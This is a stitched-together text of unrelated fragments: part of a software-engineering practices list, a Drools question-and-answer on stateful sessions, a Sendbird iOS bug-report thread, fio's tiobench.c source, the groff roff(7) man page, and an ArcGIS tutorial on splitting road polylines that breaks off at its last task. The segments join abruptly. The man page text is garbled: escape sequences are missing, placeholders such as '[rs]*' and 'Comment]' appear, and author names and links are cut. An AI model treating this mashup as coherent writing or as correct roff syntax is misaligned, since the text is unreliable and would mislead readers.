• Agile Development – Agile development is a method of creating software that emphasizes flexibility, teamwork, and responsiveness to change. It focuses on working in brief iterations, regularly testing and improving the software, and adapting to changing needs and stakeholder feedback. This iterative approach provides increased flexibility and ensures that the software satisfies the project's changing requirements.

• Version Control – Version control is a system for managing changes to software code. It allows developers to track changes, collaborate on code changes, and revert to previous versions of the code if necessary. Some popular version control systems include Git and SVN.
• Testing – Testing holds a pivotal position in the software development process. Its purpose is to verify that the system meets its requirements and specifications and to identify and resolve any flaws or defects. A diverse array of testing methods is available, including unit testing, integration testing, and acceptance testing.
• Documentation – Documentation is critical to keeping software systems maintainable and comprehensible to others. Developers should document their code and system design carefully, and provide user manuals and other material that helps users understand how the system works and how to use it.
• Code Reviews – In a code review, other developers examine code changes before they are merged into the main codebase. Reviews catch errors and issues before they become serious problems, and they help ensure that the code is maintainable, readable, and consistent with best practices.
• Continuous Integration and Deployment – Continuous integration and deployment automate the process of building, testing, and deploying software systems. They ensure that changes are quickly and consistently integrated into the main codebase and that the system is always in a deployable state.
• Security – Security is essential in software engineering. Developers must follow industry best practices to protect software systems. This entails implementing dependable safeguards such as encryption, authentication, and access control, and regularly conducting vulnerability assessments and testing.
• Performance Tuning – Performance tuning is the process of improving the functionality and performance of software systems.
It comprises ongoing monitoring and analysis of system performance, followed by the code or infrastructure optimizations needed to improve it. To reach the desired performance levels, developers must evaluate the system carefully and make the necessary modifications.
Conclusion
Developers play a crucial role in the success of software development projects when they adhere to essential software engineering principles such as KISS, DRY, YAGNI, SOLID, and Occam's Razor. These principles help developers build dependable, efficient, and manageable software systems that fulfill user and stakeholder requirements while managing complexity, improving quality, and mitigating risk. By collaborating actively with the development team, software engineers can create influential software systems that foster innovation and enhance efficiency. The field of software engineering offers individuals the opportunity to make a significant impact by creating new technologies, solving intricate problems, and driving progress across industries.
(I am a bit new to working with Drools, so please excuse me if this is a simple question.)
I would like to use Drools for reactive execution of rules, which means we could consider the "facts" being inserted to be "event" instances. However, I want rules to be fired as soon as events are received. But in the case that a rule depends on several events, how can I configure the Working Memory to remember previous events?
Consider a very simple example. Say I have the following rules:
- when (E1) do A1
- when (E2) do A2
- when (E1,E2) do A3
Then, if time progresses as follows, I want the following rules to be fired:
- t=1, E1 happens => A1 fired
- t=2, E2 happens => A2 fired + A3 fired
The problem I have is that if I call ksession.fireAllRules() after every insertion, the working memory will forget all previous events. What is the best way to achieve this?

1 Answer (accepted)
As long as you use a Stateful Knowledge Session, which you probably do since the stateless one has no fireAllRules() method, the WM will not forget the inserted facts. What you express as "E1 happens" should be ksession.insert(E1); You may play with the example given in the documentation (link above).
Comment: Thanks pgras, I've fixed my code now. Although I am now trying to understand how the rule engine knows not to re-fire the rules it has already matched, since the facts remain in WM. If this happens to be explained in any docs, it would be helpful to read. – Larry, Jan 17 '13
Comment: Yes, that's explained in the docs. Rules are activated by sets of facts: when a set of facts that matches a rule's conditions is inserted, the activation is created and then fired (on fireAllRules()).
After that, if you modify one of your facts and notify the engine (ksession.modify/update), the activation will be recreated and the rule can be re-fired. If you don't change your fact, the rule will be activated and fired just once for that combination of facts. – salaboy, Jan 18 '13
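To illustrate the accepted answer's point, here is a toy sketch in Python (this is not the Drools API; all names are hypothetical): a stateful session keeps its facts across `fire_all_rules()` calls, and an activation fires only once per fact combination unless a fact changes.

```python
class ToyStatefulSession:
    """Toy model of a stateful rule session: facts persist across
    fire_all_rules() calls, and each activation fires only once."""

    def __init__(self, rules):
        self.rules = rules      # list of (set of required event names, action)
        self.facts = []         # working memory: retained between calls
        self.fired = set()      # activations that have already fired

    def insert(self, event_name):
        self.facts.append(event_name)

    def fire_all_rules(self):
        fired_now = []
        present = set(self.facts)
        for required, action in self.rules:
            if required <= present and action not in self.fired:
                self.fired.add(action)
                fired_now.append(action)
        return fired_now


rules = [({"E1"}, "A1"), ({"E2"}, "A2"), ({"E1", "E2"}, "A3")]
session = ToyStatefulSession(rules)
session.insert("E1")
print(session.fire_all_rules())   # t=1: ['A1']
session.insert("E2")
print(session.fire_all_rules())   # t=2: ['A2', 'A3']
```

In real Drools, the agenda and fact handles play the role of `fired` and `facts` here; the point is only that calling the fire method repeatedly does not clear the working memory of a stateful session.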
`SBUBaseChannelViewController` bug when calling `loadChannel(channelUrl:messageListParams:)`
When SBUBaseChannelViewController is initialized with a certain channel ID and then loads a different channel by calling loadChannel(channelUrl:messageListParams:), the channelUrl property is not updated. This results in a bug where the pending message doesn't get removed. The code proceeds as follows:
1. SBUPendingMessageManager.shared.upsertPendingMessage is called with baseChannel.channelUrl.
2. Subsequent calls to SBUPendingMessageManager are made with channelUrl.
I confirmed that the first insert into SBUBaseChannelViewController.pendingMessages is made with the correct channel ID, whereas later calls for the pending status and success status are made with the initial channel ID. Please let me know when this gets fixed.
I was able to confirm that things work as they should when calling viewController.setValue(id, forKey: "channelUrl") in conjunction with loadChannel.
Wondering if anyone has looked into this issue… :roll_eyes:
Hi @GoGo7
Sorry for checking your problem so late. ChannelViewController was not originally designed to change channels internally, but through the loadChannel function it should be able to do what you want. And thanks to your report, I found the problem: the logic does not update the channelUrl. I will fix this in the new version. However, the regular release schedule is in two weeks. Can you wait for that release?
Sounds good. Thank you.
@GoGo7 Regarding this issue, iOS version 2.2.6 was released yesterday (Mar 28th).
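The underlying bug pattern is not Swift-specific. A minimal Python sketch (hypothetical names, not the Sendbird SDK) shows why every later lookup must use the updated identifier rather than the one captured at initialization:

```python
class ChannelViewController:
    def __init__(self, channel_url):
        self.channel_url = channel_url   # identifier captured at init
        self.pending = {}                # channel_url -> pending messages

    def load_channel(self, channel_url):
        # The fix: keep the stored identifier in sync with the loaded channel.
        # Without this line, upserts are keyed under the new URL while later
        # status lookups still use the old one -- the reported bug.
        self.channel_url = channel_url

    def upsert_pending(self, channel_url, message):
        self.pending.setdefault(channel_url, []).append(message)

    def resolve_pending(self, message):
        # Later calls look up messages via the stored identifier.
        queue = self.pending.get(self.channel_url, [])
        if message in queue:
            queue.remove(message)
            return True
        return False


vc = ChannelViewController("channel-A")
vc.load_channel("channel-B")
vc.upsert_pending("channel-B", "hello")
print(vc.resolve_pending("hello"))   # True only because load_channel updated the URL
```

The `setValue(id, forKey: "channelUrl")` workaround in the thread does by hand exactly what the commented line in `load_channel` does here.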
Split mutex.c and .h each into three files [fio.git] / profiles / tiobench.c

#include "../fio.h"
#include "../profile.h"
#include "../parse.h"
#include "../optgroup.h"

static unsigned long long size;
static unsigned int loops = 1;
static unsigned int bs = 4096;
static unsigned int nthreads = 1;
static char *dir;

static char sz_idx[80], bs_idx[80], loop_idx[80], dir_idx[80], t_idx[80];

static const char *tb_opts[] = {
	"buffered=0", sz_idx, bs_idx, loop_idx, dir_idx, t_idx,
	"timeout=600", "group_reporting", "thread", "overwrite=1",
	"filename=.fio.tio.1:.fio.tio.2:.fio.tio.3:.fio.tio.4",
	"ioengine=sync",
	"name=seqwrite", "rw=write", "end_fsync=1",
	"name=randwrite", "stonewall", "rw=randwrite", "end_fsync=1",
	"name=seqread", "stonewall", "rw=read",
	"name=randread", "stonewall", "rw=randread", NULL,
};

struct tiobench_options {
	unsigned int pad;
	unsigned long long size;
	unsigned int loops;
	unsigned int bs;
	unsigned int nthreads;
	char *dir;
};

static struct tiobench_options tiobench_options;

static struct fio_option options[] = {
	{
		.name	= "size",
		.lname	= "Tiobench size",
		.type	= FIO_OPT_STR_VAL,
		.off1	= offsetof(struct tiobench_options, size),
		.help	= "Size in MiB",
		.category = FIO_OPT_C_PROFILE,
		.group	= FIO_OPT_G_TIOBENCH,
	},
	{
		.name	= "block",
		.lname	= "Tiobench block",
		.type	= FIO_OPT_INT,
		.off1	= offsetof(struct tiobench_options, bs),
		.help	= "Block size in bytes",
		.def	= "4096",
		.category = FIO_OPT_C_PROFILE,
		.group	= FIO_OPT_G_TIOBENCH,
	},
	{
		.name	= "numruns",
		.lname	= "Tiobench numruns",
		.type	= FIO_OPT_INT,
		.off1	= offsetof(struct tiobench_options, loops),
		.help	= "Number of runs",
		.category = FIO_OPT_C_PROFILE,
		.group	= FIO_OPT_G_TIOBENCH,
	},
	{
		.name	= "dir",
		.lname	= "Tiobench directory",
		.type	= FIO_OPT_STR_STORE,
		.off1	= offsetof(struct tiobench_options, dir),
		.help	= "Test directory",
		.category = FIO_OPT_C_PROFILE,
		.group	= FIO_OPT_G_TIOBENCH,
		.no_free = true,
	},
	{
		.name	= "threads",
		.lname	= "Tiobench threads",
		.type	= FIO_OPT_INT,
		.off1	= offsetof(struct tiobench_options, nthreads),
		.help	= "Number of Threads",
		.category = FIO_OPT_C_PROFILE,
		.group	= FIO_OPT_G_TIOBENCH,
	},
	{
		.name	= NULL,
	},
};

/*
 * Fill our private options into the command line
 */
static int tb_prep_cmdline(void)
{
	/*
	 * tiobench uses size as MiB, so multiply up
	 */
	size *= 1024 * 1024ULL;
	if (size)
		sprintf(sz_idx, "size=%llu", size);
	else
		strcpy(sz_idx, "size=4*1024*$mb_memory");

	sprintf(bs_idx, "bs=%u", bs);
	sprintf(loop_idx, "loops=%u", loops);

	if (dir)
		sprintf(dir_idx, "directory=%s", dir);
	else
		sprintf(dir_idx, "directory=./");

	sprintf(t_idx, "numjobs=%u", nthreads);
	return 0;
}

static struct profile_ops tiobench_profile = {
	.name		= "tiobench",
	.desc		= "tiotest/tiobench benchmark",
	.prep_cmd	= tb_prep_cmdline,
	.cmdline	= tb_opts,
	.options	= options,
	.opt_data	= &tiobench_options,
};

static void fio_init tiobench_register(void)
{
	if (register_profile(&tiobench_profile))
		log_err("fio: failed to register profile 'tiobench'\n");
}

static void fio_exit tiobench_unregister(void)
{
	unregister_profile(&tiobench_profile);
}
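The interesting part of the profile is tb_prep_cmdline(), which expands the user-visible options into fio job option strings before the canned tb_opts job list runs. A rough Python re-implementation of just that expansion logic (for illustration only; the real logic is the C above):

```python
def tb_prep_cmdline(size_mb=0, bs=4096, loops=1, nthreads=1, directory=None):
    """Expand tiobench profile options into fio job option strings,
    mirroring tb_prep_cmdline() in profiles/tiobench.c."""
    size = size_mb * 1024 * 1024   # tiobench takes size in MiB, fio wants bytes
    return [
        "size=%d" % size if size else "size=4*1024*$mb_memory",
        "bs=%d" % bs,
        "loops=%d" % loops,
        "directory=%s" % (directory if directory else "./"),
        "numjobs=%d" % nthreads,
    ]


print(tb_prep_cmdline(size_mb=4, nthreads=2))
# ['size=4194304', 'bs=4096', 'loops=1', 'directory=./', 'numjobs=2']
```

Note the fallback when no size is given: the C code emits the fio expression "size=4*1024*$mb_memory", i.e. four times the machine's memory, so the benchmark cannot run from the page cache.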
ROFF Section: Environments, Tables, and Troff Macros (7) Updated: 3 June 2004

NAME
roff - concepts and history of roff typesetting

DESCRIPTION
roff is the general name for a set of type-setting programs, known under names like troff, nroff, ditroff, groff, etc. A roff type-setting system consists of an extensible text formatting language and a set of programs for printing and converting to other text formats. Traditionally, it is the main text processing system of Unix; every Unix-like operating system still distributes a roff system as a core package.
The most common roff system today is the free software implementation GNU roff, groff(1). The pre-groff implementations are referred to as classical (dating back as far as 1973). groff implements the look-and-feel and functionality of its classical ancestors, but has many extensions. As groff is the only roff system that is available for every (or almost every) computer system, it is the de-facto roff standard today.
In some ancient Unix systems, there was a binary called roff that implemented the even more ancient runoff of the Multics operating system, cf. section HISTORY. The functionality of this program was very restricted even in comparison to ancient troff; it is not supported any longer. Consequently, in this document, the term roff always refers to the general meaning of a roff system, not to the ancient roff binary.
In spite of its age, roff is in wide use today; for example, the manual pages on UNIX systems (man pages), many software books, system documentation, standards, and corporate documents are written in roff. The roff output for text devices is still unmatched, and its graphical output has the same quality as other free type-setting programs and is better than some of the commercial systems. The most popular application of roff is the concept of manual pages, or shortly man pages; this is the standard documentation system on many operating systems.
This document describes the historical facts around the development of the roff system; some usage aspects common to all roff versions; details of the roff pipeline, which is usually hidden behind front-ends like groff(1); a general overview of the formatting language; some tips for editing roff files; and many pointers to further reading.

HISTORY
The roff text processing system has a very long history, dating back to the 1960s. The roff system itself is intimately connected to the Unix operating system, but its roots go back to the earlier operating systems CTSS and Multics.

The Predecessor runoff
The evolution of roff is intimately related to the history of the operating systems. Its predecessor runoff was written by Jerry Saltzer on the CTSS operating system (Compatible Time Sharing System) as early as 1961. When CTSS was further developed into the operating system Multics, the famous predecessor of Unix from 1963, runoff became the main format for documentation and text processing. Both operating systems could only be run on very expensive computers at that time, so they were mostly used in research and for official and military tasks.
The possibilities of the runoff language were quite limited as compared to modern roff. Only text output was possible in the 1960s. This could be implemented by a set of requests of length 2, many of which are still used identically in roff. The language was modelled according to the habits of typesetting in the pre-computer age, where lines starting with a dot were used in manuscripts to denote formatting requests to the person who would later perform the typesetting manually.
The runoff program was written first in the PL/1 language, later on in BCPL, the grandmother of the C programming language. In the Multics operating system, the help system was handled by runoff, similar to roff's task of managing the Unix manual pages. There are still documents written in the runoff language; for examples, see Saltzer's home page, cf.
section SEE ALSO.

The Classical nroff/troff System
In the 1970s, the Multics off-spring Unix became more and more popular because it could be run on affordable machines and was easily available to universities at that time. At MIT (the Massachusetts Institute of Technology), there was a need to drive the Wang Graphic Systems CAT typesetter, a graphical output device, from a PDP-11 computer running Unix. As runoff was too limited for this task, it was further developed into a more powerful text formatting system by Josef F. Osanna, a main developer of the Multics operating system and programmer of several runoff ports.
The name runoff was shortened to roff. The greatly enlarged language of Osanna's concept already included all elements of a full roff system. All modern roff systems try to implement compatibility with this system. So Joe Osanna can be called the father of all roff systems.
This first roff system had three formatter programs. troff (typesetter roff) generated graphical output for the CAT typesetter as its only device. nroff produced text output suitable for terminals and line printers. roff was the reimplementation of the former runoff program with its limited features; this program was abandoned in later versions. Today, the name roff is used to refer to a troff/nroff system as a whole.
Osanna's first version was written in the PDP-11 assembly language and released in 1973. Brian Kernighan joined the roff development by rewriting it in the C programming language. The C version was released in 1975.
The syntax of the formatting language of the nroff/troff programs was documented in the famous Troff User's Manual [CSTR #54], first published in 1976, with further revisions up to 1992 by Brian Kernighan. This document is the specification of classical troff. All later roff systems tried to establish compatibility with this specification.
After Osanna died of a heart attack in 1977, at the age of about 50, Kernighan went on developing troff.
The next milestone was to equip troff with a general interface to support more devices: the intermediate output format and the postprocessor system. This completed the structure of a roff system as it is still in use today; see section USING ROFF. In 1979, these novelties were described in the paper [CSTR #97]. This new troff version is the basis for all existing newer troff systems, including groff. On some systems, this device-independent troff got a binary of its own, called ditroff(7). All modern troff programs already provide the full ditroff capabilities automatically.

Commercialization
A major degradation occurred when the easily available Unix 7 operating system was commercialized. A whole bunch of divergent operating systems emerged, fighting each other with incompatibilities in their extensions. Luckily, the incompatibilities did not affect the original troff. All of the different commercial roff systems made heavy use of Osanna/Kernighan's open source code and documentation, but sold them as "their" system, with only minor additions.
The source code of both the ancient Unix and classical troff wasn't available for two decades. Fortunately, Caldera bought SCO UNIX in 2001. In the following, Caldera made the ancient source code accessible on-line for non-commercial use; cf. section SEE ALSO.

Free roff
None of the commercial roff systems could attain the status of a successor for the general roff development. Everyone was only interested in their own stuff. This led to a steep downfall of the once excellent Unix operating system during the 1980s. As a counter-measure to the galloping commercialization, AT&T Bell Labs tried to launch a rescue project with their Plan 9 operating system. It is freely available for non-commercial use, even the source code, but has a proprietary license that impedes free development. This concept is outdated, so Plan 9 was not accepted as a platform to bundle the main-stream development.
The only remedy came from the emerging free operating systems (386BSD, GNU/Linux, etc.) and software projects during the 1980s and 1990s. These implemented the ancient Unix features and many extensions, such that the old experience is not lost. In the 21st century, Unix-like systems are again a major factor in the computer industry, thanks to free software.
The most important free roff project was the GNU port of troff, created by James Clark and put under the GNU General Public License. It was called groff (GNU roff). See groff(1) for an overview. The groff system is still actively developed. It is compatible with classical troff, but many extensions were added. It is the first roff system that is available on almost all operating systems, and it is free. This makes groff the de-facto roff standard today.

USING ROFF
Most people won't even notice that they are actually using roff. When you read a system manual page (man page), roff is working in the background. Roff documents can be viewed with a native viewer called xditview(1x), a standard program of the X window distribution; see X(7x). But using roff explicitly isn't difficult either.
Some roff implementations provide wrapper programs that make it easy to use the roff system on the shell command line. For example, the GNU roff implementation groff(1) provides command line options to avoid the long command pipes of classical troff; the program grog(1) tries to guess from the document which arguments should be used for a run of groff; people who do not like specifying command line options should try the groffer(1) program for graphically displaying groff files and man pages.

The roff Pipe
Each roff system consists of preprocessors, roff formatter programs, and a set of device postprocessors. This concept makes heavy use of the piping mechanism: a series of programs is called one after the other, where the output of each program in the queue is taken as the input for the next program.
  preprocessor | troff | postprocessor

The preprocessors generate roff code that is fed into a roff formatter (e.g. troff), which in turn generates intermediate output that is fed into a device postprocessor program for printing or final output. All of these parts use programming languages of their own; each language is totally unrelated to the others. Moreover, roff macro packages that were tailored for special purposes can be included. Most roff documents use the macros of some package, intermixed with code for one or more preprocessors, spiced with some elements from the plain roff language. The full power of the roff formatting language is seldom needed by users; only programmers of macro packages need to know about the gory details.

Preprocessors
A roff preprocessor is any program that generates output that syntactically obeys the rules of the roff formatting language. Each preprocessor defines a language of its own that is translated into roff code when run through the preprocessor program. Parts written in these languages may be included within a roff document; they are identified by special roff requests or macros. Each document that is enhanced by preprocessor code must be run through all corresponding preprocessors before it is fed into the actual roff formatter program, for the formatter just ignores all alien code. The preprocessor programs extract and transform only the document parts that are intended for them.
There are a lot of free and commercial roff preprocessors. Some of them aren't available on every system, but a small set of preprocessors is considered an integral part of each roff system. The classical preprocessors are:
tbl for tables
eqn for mathematical formulae
pic for drawing diagrams
refer for bibliographic references
soelim for including macro files from standard locations
Other known preprocessors that are not available on all systems include:
chem for drawing chemical formulae
grap for constructing graphical elements
grn for including gremlin(1) pictures

Formatter Programs
A roff formatter is a program that parses documents written in the roff formatting language or using some of the roff macro packages. It generates intermediate output, which is intended to be fed into a single device postprocessor that must be specified by a command-line option to the formatter program. The documents must have been run through all necessary preprocessors before.
The output produced by a roff formatter is represented in yet another language, the intermediate output format or troff output. This language was first specified in [CSTR #97]; its GNU extension is documented in groff_out(5). The intermediate output language is a kind of assembly language compared to the high-level roff language. The generated intermediate output is optimized for a particular device, but the language is the same for every device.
The roff formatter is the heart of the roff system. The traditional roff had two formatters, nroff for text devices and troff for graphical devices. Often, the name troff is used as a general term to refer to both formatters.

Devices and Postprocessors
Devices are hardware interfaces like printers and text or graphical terminals, or software interfaces such as a conversion into a different text or graphical format.
A roff postprocessor is a program that transforms troff output into a form suitable for a particular device. The roff postprocessors are like device drivers for the output target. For each device there is a postprocessor program that fits the device optimally. The postprocessor parses the generated intermediate output and generates device-specific code that is sent directly to the device.
The names of the devices and the postprocessor programs are not fixed because they greatly depend on the software and hardware abilities of the actual computer. For example, the classical devices mentioned in [CSTR #54] have greatly changed since the classical times.
The old hardware doesn't exist any longer, and the old graphical conversions were quite imprecise when compared to their modern counterparts. For example, the Postscript device post in classical troff had a resolution of 720, while groff's ps device has 72000, a refinement by a factor of 100. Today the operating systems provide device drivers for most printer-like hardware, so it isn't necessary to write a special hardware postprocessor for each printer.

ROFF PROGRAMMING
Documents using roff are normal text files decorated by roff formatting elements. The roff formatting language is quite powerful; it is almost a full programming language and provides elements for extending the language. With these, it became possible to develop macro packages that are tailored for special applications. Such macro packages are much handier than plain roff, so most people will choose a macro package without worrying about the internals of the roff language.

Macro Packages
Macro packages are collections of macros that are suitable for formatting a special kind of document in a convenient way. This greatly eases the usage of roff. The macro definitions of a package are kept in a file called name.tmac (classically tmac.name). All tmac files are stored in one or more directories at standardized positions. Details on the naming of macro packages and their placement are found in groff_tmac(5). A macro package that is to be used in a document can be announced to the formatter by the command line option
The roff Formatting Language The classical roff formatting language is documented in the Troff User's Manual [CSTR~#54]. The roff language is a full programming language providing requests, definition of macros, escape sequences, string variables, number or size registers, and flow controls. Requests are the predefined basic formatting commands similar to the commands at the shell prompt. The user can define request-like elements using predefined roff elements. These are then called macros. A document writer will not note any difference in usage for requests or macros; both are written on a line on their own starting with a dot. Escape sequences are roff elements starting with a backslash They can be inserted anywhere, also in the midst of text in a line. They are used to implement various features, including the insertion of non-ASCII characters with font changes with in-line comments with the escaping of special control characters like and many other features. Strings are variables that can store a string. A string is stored by the .ds request. The stored string can be retrieved later by the [rs]* escape sequence. Registers store numbers and sizes. A register can be set with the request .nr and its value can be retrieved by the escape sequence [rs]n.   FILE NAME EXTENSIONS Manual pages (man pages) take the section number as a file name extension, e.g., the filename for this document is roff.7, i.e., it is kept in section~7 of the man pages. The classical macro packages take the package name as an extension, e.g. file.me for a document using the me macro package, file.mm for mm, file.ms for ms, file.pic for pic files, etc. But there is no general naming scheme for roff documents, though file.tr for troff file is seen now and then. Maybe there should be a standardization for the filename extensions of roff files. File name extensions can be very handy in conjunction with the less(1) pager. 
It provides the possibility to feed all input into a command-line pipe that is specified in the shell environment variable LESSOPEN. This process is not well documented, so here an example:   ellCommand LESSOPEN='|lesspipe %s' where lesspipe is either a system supplied command or a shell script of your own.   EDITING ROFF The best program for editing a roff document is Emacs (or Xemacs), see emacs(1). It provides an nroff mode that is suitable for all kinds of roff dialects. This mode can be activated by the following methods. When editing a file within Emacs the mode can be changed by typing `M-x nroff-mode', where M-x means to hold down the Meta key (or Alt) and hitting the x~key at the same time. But it is also possible to have the mode automatically selected when the file is loaded into the editor. The most general method is to include the following 3 comment lines at the end of the file. Comment] Local Variables: Comment] mode: nroff Comment] End: There is a set of file name extensions, e.g. the man pages that trigger the automatic activation of the nroff mode. Theoretically, it is possible to write the sequence Comment] -*- nroff -*- as the first line of a file to have it started in nroff mode when loaded. Unfortunately, some applications such as the man program are confused by this; so this is deprecated. All roff formatters provide automated line breaks and horizontal and vertical spacing. In order to not disturb this, the following tips can be helpful. Never include empty or blank lines in a roff document. Instead, use the empty request (a line consisting of a dot only) or a line comment Comment] if a structuring element is needed. Never start a line with whitespace because this can lead to unexpected behavior. Indented paragraphs can be constructed in a controlled way by roff requests. Start each sentence on a line of its own, for the spacing after a dot is handled differently depending on whether it terminates an abbreviation or a sentence. 
To distinguish both cases, do a line break after each sentence. To additionally use the auto-fill mode in Emacs, it is best to insert an empty roff request (a line consisting of a dot only) after each sentence. The following example shows how optimal roff editing could look. This is an example for a roff document. This is the next sentence in the same paragraph. This is a longer sentence stretching over several lines; abbreviations like `cf.' are easily identified because the dot is not followed by a line break. In the output, this will still go to the same paragraph. Besides Emacs, some other editors provide nroff style files too, e.g. vim(1), an extension of the vi(1) program.   BUGS UNIX[rg] is a registered trademark of the Open Group. But things have improved considerably after Caldera had bought SCO UNIX in 2001.   SEE ALSO There is a lot of documentation on roff. The original papers on classical troff are still available, and all aspects of groff are documented in great detail.   Internet sites troff.org provides an overview and pointers to all historical aspects of roff. Multics contains a lot of information on the MIT projects, CTSS, Multics, early Unix, including runoff; especially useful are a glossary and the many links to ancient documents. Unix Archive provides the source code and some binaries of the ancient Unixes (including the source code of troff and its documentation) that were made public by Caldera since 2001, e.g. of the famous Unix version~7 for PDP-11 at the Developers at AT&T Bell Labs provides a search facility for tracking information on the early developers. Plan 9 by AT&T Bell Labs. runoff stores some documents using the ancient runoff formatting language. CSTR Papers stores the original troff manuals (CSTR #54, #97, #114, #116, #122) and famous historical documents on programming. GNU roff provides the free roff implementation groff, the actual standard roff.   
Historical roff Documentation

Many classical troff documents are still available on-line. The two main manuals of the troff language are

[CSTR #54] J. F. Osanna, Bell Labs, 1976; revised by Brian Kernighan, 1992.
[CSTR #97] Brian Kernighan, Bell Labs, 1981, revised March 1982.

The "little language" roff papers are

[CSTR #114] Jon L. Bentley and Brian W. Kernighan, Bell Labs, August 1984.
[CSTR #116] Brian W. Kernighan, Bell Labs, December 1984.
[CSTR #122] J. L. Bentley, L. W. Jelinski, and B. W. Kernighan, Bell Labs, April 1986.

Manual Pages

Due to its complex structure, a full roff system has many man pages, each describing a single aspect of roff. Unfortunately, there is no general naming scheme for the documentation among the different roff implementations. In groff, the man page groff(1) contains a survey of all documentation available in groff. On other systems, you are on your own, but troff(1) might be a good starting point.

AUTHORS

Copyright (C) 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc.

This document is distributed under the terms of the FDL (GNU Free Documentation License) version 1.1 or later. You should have received a copy of the FDL on your system; it is also available on-line at the

This document is part of groff, the GNU roff distribution. It was written by

it is maintained by
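The LESSOPEN tip in the notes above leaves the lesspipe filter itself unspecified. Purely as an illustration, a user-written lesspipe might look like the following sketch; the file-name patterns and the groff invocation are my own assumptions, not the behavior of any system-supplied lesspipe.

```shell
#!/bin/sh
# Sketch of a user-written lesspipe filter for LESSOPEN='|lesspipe %s'.
# File-name patterns and the groff fallback are illustrative assumptions.
lesspipe() {
    case "$1" in
        *.[1-9]|*.man|*.roff)
            # Format roff sources if groff is available, else pass through.
            if command -v groff >/dev/null 2>&1; then
                groff -man -Tutf8 -- "$1"
            else
                cat -- "$1"
            fi ;;
        *)
            cat -- "$1" ;;
    esac
}
[ "$#" -gt 0 ] && lesspipe "$@" || :
```

With LESSOPEN='|lesspipe %s' exported, less would pipe each viewed file through this filter before display.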
Road Repairs
Splitting polylines with Visual Basic scripting
By Mike Price, Entrada/San Juan, Inc.

What You Will Need
• ArcGIS Desktop (ArcView, ArcEditor, or ArcInfo license)
• Sample data (splittinglines.zip)

Before working this exercise, you should complete "Under Construction: Building and Calculating Turn Radii" so you will understand how to calculate turn radii. That article showed how to calculate turns or curve radii for a steep, winding road. The tutorial used predefined tangent points to create turn chords and to split a road centerline. This exercise will reinforce the turn chord construction technique taught in that article and teach endpoint modeling. It uses a Visual Basic (VB) script that splits all constructed curves in just one run.

This tutorial includes five tasks:

Task 1: After creating turn chords, add fields to store coordinates of start and endpoints.
Task 2: Calculate coordinates of start and endpoints.
Task 3: Load all endpoints as event themes.
Task 4: Run the Visual Basic script to split the road centerline at turn chord endpoints.
Task 5: Assign turn numbers, join turn chord and middle ordinate lengths, then calculate turn radii.

Create four new fields to store X and Y coordinates for both endpoints.

Getting Started

Download the splittinglines.zip training set from ArcUser Online. Extract the data into a project folder and preview it in ArcCatalog. This exercise uses the original road centerline and constructs turn chords and middle ordinates. Hint: When building chords from scratch, be sure to snap to road centerline vertices.

Open \Chuckanut2\Chuckanut2.mxd. Navigate to \Chuckanut2\SHPFiles\WASP83NFH and add the Turn Chords layer. Open and inspect its table. We will use chord endpoint coordinates to create our splitting points.
Task 1: Add Endpoint Coordinate Fields

First, create four new fields to store X and Y coordinates for both endpoints. These points will be stored in Washington State Plane North American Datum of 1983 (NAD 83) High Accuracy Reference Network (HARN) North in U.S. Feet.

1. Open the Turn Chords table and review its structure.
2. Open Options and select Add Field. Name the field Start_X, set its Type to Double, and set its precision to 14 and its scale to 4. Because this point must be on or very near the target line, the extra precision should help.
3. Add three more fields named Start_Y, End_X, and End_Y. Use the same data type, precision, and scale for all fields.

Task 2: Calculate and Copy Endpoint Coordinates

Calculate the endpoint coordinates as follows.

1. Begin by right-clicking the Start_X field header and selecting Calculate Geometry. Set Property to X Coordinate of Line Start. Use the data frame's coordinate system and set units to Feet U.S. [ft]. Click OK to calculate coordinates.
2. Continue to calculate coordinates for Start_Y, End_X, and End_Y using the same procedure. Select the correct property for each field (e.g., End_X for the End_X field); if the wrong property is selected, just recalculate the field.
3. Navigate to \Chuckanut2\SHPFiles\WASP83NFH and copy Chord1.dbf to the clipboard. Navigate to \Chuckanut2\DBFFiles and paste Chord1.dbf in this folder. Right-click on the file and rename it Chord1_XY.dbf.
4. Add Chord1_XY.dbf back to the ArcMap document and switch to the table of contents (TOC) Source tab. Save the project.

Task 3: Load Endpoints as Event Themes

1. In the Source tab, open and inspect Chord1_XY. Right-click on this table in the TOC and choose Display XY Data. Enter Start_X for the X Field and Start_Y for the Y Field to define the event theme. Import the coordinate system from Chords1.shp. Rename this layer StartPoints.
2. Right-click on Chord1_XY again, and again choose Display XY Data.
Enter End_X for the X Field and End_Y for the Y Field. Import the coordinate system from Chords1.shp. Rename this layer EndPoints.
3. Carefully inspect the points to verify that they are very close to the actual endpoints of each chord. Zoom to Bookmark CR MP 0.0 1:3,000. Save the project.

Task 4: Load and Run the Line Splitting Script

After making the event themes StartPoints and EndPoints the only selectable themes, select all points and run the SplitLinesAtPoints script.

A Visual Basic script that uses points to split line segments will be used to split the Chuckanut Ridge Road centerline. The script and supporting information are available in the \Chuckanut2\Utility\ folder.

1. It is important to remove Turn Chords from the project so the only polyline theme is Chuckanut Ridge Road.
2. In the ArcMap standard menu, choose Tools > Macros > Visual Basic Editor to open an empty VB scripting window.
3. After the VB Editor opens in its own window, locate the Project window and notice the Normal and Project selections. Selecting Normal will store changes for all maps accessed on this computer. Selecting Project will store changes only for this map document. For this model, select and expand Project.
4. In the VB Editor standard menu, choose File > Import File. Navigate to \Chuckanut2\Utility, locate SplitLinesAtPoints.bas, and click Open.
5. Expand the Modules folder; double-click the SplitLinesAtPoints module to view the VB code. No changes are required to this code. Close the VB window. Save the ArcMap document now to save this script in this project.
6. To run the script in ArcMap, verify that the polyline target (Chuckanut Ridge Road) and the splitting points (StartPoints and EndPoints) are in the TOC. Zoom to Bookmark CR All 1:12,000.
7. Choose Tools > Editor toolbar to load the Editor toolbar, and choose Editor > Start Editing from the drop-down menu. Select the \Chuckanut2\SHPFiles\WASP83NFH\ folder as the folder to edit data from.
8.
Make both StartPoints and EndPoints the only selectable layers. Use Zoom Out and the Selection tool, or use the table, to select all 47 points.
9. In the Tools menu, choose Macros > Macros, select SplitLinesAtPoints, and click Run. Review the summary windows to see how many points were used to split the road and how many splits occurred. This will actually split the road twice, using both event theme sets. Save the edits and the project.

Task 5: Assign Turn Numbers

